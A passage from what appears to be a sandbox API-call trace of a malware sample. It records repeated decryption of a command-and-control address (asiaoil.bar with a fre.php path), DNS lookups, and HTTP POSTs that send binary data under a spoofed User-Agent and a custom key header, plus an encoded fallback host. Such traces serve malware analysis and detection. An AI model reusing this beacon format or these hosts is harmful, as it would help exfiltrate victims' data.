(hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.502] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.502] GetProcessHeap () returned 0x740000 [0309.502] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0309.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.504] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0309.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.505] CryptDestroyKey (hKey=0x74d368) returned 1 [0309.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.506] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0309.506] GetProcessHeap () returned 0x740000 [0309.506] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0309.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.508] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0309.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.509] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0309.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.511] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0309.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.512] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0309.512] GetProcessHeap () returned 0x740000 [0309.512] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0309.512] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0309.514] GetProcessHeap () returned 0x740000 [0309.514] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0309.514] socket (af=2, type=1, protocol=6) returned 0x2e4 [0309.514] connect (s=0x2e4, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0309.536] FreeAddrInfoW (pAddrInfo=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0309.536] GetProcessHeap () returned 0x740000 [0309.536] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cf68 [0309.536] GetProcessHeap () returned 0x740000 [0309.536] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0309.537] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0309.538] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0309.538] GetProcessHeap () returned 0x740000 [0309.538] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0309.538] GetProcessHeap () returned 0x740000 [0309.539] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0309.539] GetProcessHeap () returned 0x740000 [0309.539] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7639c8 [0309.539] GetProcessHeap () returned 0x740000 [0309.539] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0309.540] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0309.541] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0309.541] GetProcessHeap () returned 0x740000 [0309.541] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0309.541] GetProcessHeap () returned 0x740000 [0309.542] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0309.542] send (s=0x2e4, buf=0x747928*, len=243, flags=0) returned 243 [0309.543] send (s=0x2e4, buf=0x761fd0*, len=159, flags=0) returned 159 [0309.543] GetProcessHeap () returned 0x740000 [0309.543] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0309.543] recv (in: s=0x2e4, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0309.653] GetProcessHeap () returned 0x740000 [0309.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0309.654] GetProcessHeap () returned 0x740000 [0309.655] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7639c8 | out: hHeap=0x740000) returned 1 [0309.655] GetProcessHeap () returned 0x740000 [0309.655] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0309.655] GetProcessHeap () returned 0x740000 [0309.655] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cf68 | out: hHeap=0x740000) returned 1 [0309.655] closesocket (s=0x2e4) returned 0 [0309.656] GetProcessHeap () returned 0x740000 [0309.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0309.656] GetProcessHeap () returned 0x740000 [0309.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0309.656] GetProcessHeap () returned 0x740000 [0309.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0309.656] GetProcessHeap () returned 0x740000 [0309.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0309.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1358) returned 0x2e4 [0309.659] Sleep (dwMilliseconds=0xea60) [0309.664] GetProcessHeap () returned 0x740000 [0309.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7637d0 [0309.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.679] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0309.688] GetProcessHeap () returned 0x740000 [0309.688] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0309.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.689] CryptImportKey (in: hProv=0x75d980, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0309.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.794] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.794] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.795] GetProcessHeap () returned 0x740000 [0309.795] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0309.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.796] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7637d0, pdwDataLen=0x19fcfc | out: pbData=0x7637d0, pdwDataLen=0x19fcfc) returned 1 [0309.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.797] CryptDestroyKey (hKey=0x74d768) returned 1 [0309.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.797] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0309.797] GetProcessHeap () returned 0x740000 [0309.797] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0309.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.798] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.799] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.800] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.801] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.801] GetProcessHeap () returned 0x740000 [0309.801] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c098 [0309.801] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.802] GetProcessHeap () returned 0x740000 [0309.802] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c098 | out: hHeap=0x740000) returned 1 [0309.802] GetProcessHeap () returned 0x740000 [0309.802] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0309.802] GetProcessHeap () returned 0x740000 [0309.803] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7637d0 | out: hHeap=0x740000) returned 1 [0309.803] GetProcessHeap () returned 0x740000 [0309.803] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0309.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.804] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.809] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0309.873] GetProcessHeap () returned 0x740000 [0309.873] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0309.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.874] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0309.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.875] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.876] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.876] GetProcessHeap () returned 0x740000 [0309.876] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0309.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.878] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0309.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.878] CryptDestroyKey (hKey=0x74d768) returned 1 [0309.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0309.879] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0309.879] GetProcessHeap () returned 0x740000 [0309.879] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0309.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.880] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0309.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.881] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0309.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.882] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0309.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0309.883] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0309.883] GetProcessHeap () returned 0x740000 [0309.883] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0309.883] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0309.937] GetProcessHeap () returned 0x740000 [0309.937] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0309.937] socket (af=2, type=1, protocol=6) returned 0x2e8 [0309.937] connect (s=0x2e8, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0309.970] FreeAddrInfoW (pAddrInfo=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0309.970] GetProcessHeap () returned 0x740000 [0309.970] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d540 [0309.970] GetProcessHeap () returned 0x740000 [0309.970] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0309.971] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0309.972] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0309.972] GetProcessHeap () returned 0x740000 [0309.972] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0309.972] GetProcessHeap () returned 0x740000 [0309.972] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0309.972] GetProcessHeap () returned 0x740000 [0309.972] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0309.972] GetProcessHeap () returned 0x740000 [0309.973] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0309.973] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0309.974] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0309.974] GetProcessHeap () returned 0x740000 [0309.974] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0309.974] GetProcessHeap () returned 0x740000 [0309.974] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0309.974] send (s=0x2e8, buf=0x747928*, len=243, flags=0) returned 243 [0309.975] send (s=0x2e8, buf=0x761fd0*, len=159, flags=0) returned 159 [0309.975] GetProcessHeap () returned 0x740000 [0309.975] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0309.975] recv (in: s=0x2e8, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0310.104] GetProcessHeap () returned 0x740000 [0310.104] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0310.104] GetProcessHeap () returned 0x740000 [0310.105] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0310.105] GetProcessHeap () returned 0x740000 [0310.105] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0310.105] GetProcessHeap () returned 0x740000 [0310.106] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d540 | out: hHeap=0x740000) returned 1 [0310.106] closesocket (s=0x2e8) returned 0 [0310.106] GetProcessHeap () returned 0x740000 [0310.106] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0310.106] GetProcessHeap () returned 0x740000 [0310.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0310.107] GetProcessHeap () returned 0x740000 [0310.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0310.107] GetProcessHeap () returned 0x740000 [0310.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0310.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13d4) returned 0x2e8 [0310.109] Sleep (dwMilliseconds=0xea60) [0310.110] GetProcessHeap () returned 0x740000 [0310.111] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763980 [0310.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.119] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0310.128] GetProcessHeap () returned 0x740000 [0310.128] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0310.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.130] CryptImportKey (in: hProv=0x75d980, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0310.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.131] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.132] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.133] GetProcessHeap () returned 0x740000 [0310.133] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0310.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.134] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763980, pdwDataLen=0x19fcfc | out: pbData=0x763980, pdwDataLen=0x19fcfc) returned 1 [0310.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.135] CryptDestroyKey (hKey=0x74d368) returned 1 [0310.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.137] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0310.137] GetProcessHeap () returned 0x740000 [0310.137] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0310.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.138] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.139] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.140] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.142] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.142] GetProcessHeap () returned 0x740000 [0310.142] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c070 [0310.142] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.142] GetProcessHeap () returned 0x740000 [0310.143] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c070 | out: hHeap=0x740000) returned 1 [0310.143] GetProcessHeap () returned 0x740000 [0310.143] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0310.144] GetProcessHeap () returned 0x740000 [0310.144] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0310.144] GetProcessHeap () returned 0x740000 [0310.144] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7636f8 [0310.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.145] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.153] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d430) returned 1 [0310.162] GetProcessHeap () returned 0x740000 [0310.162] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0310.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.163] CryptImportKey (in: hProv=0x75d430, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0310.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.164] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.166] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.166] GetProcessHeap () returned 0x740000 [0310.166] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0310.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0310.167] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, 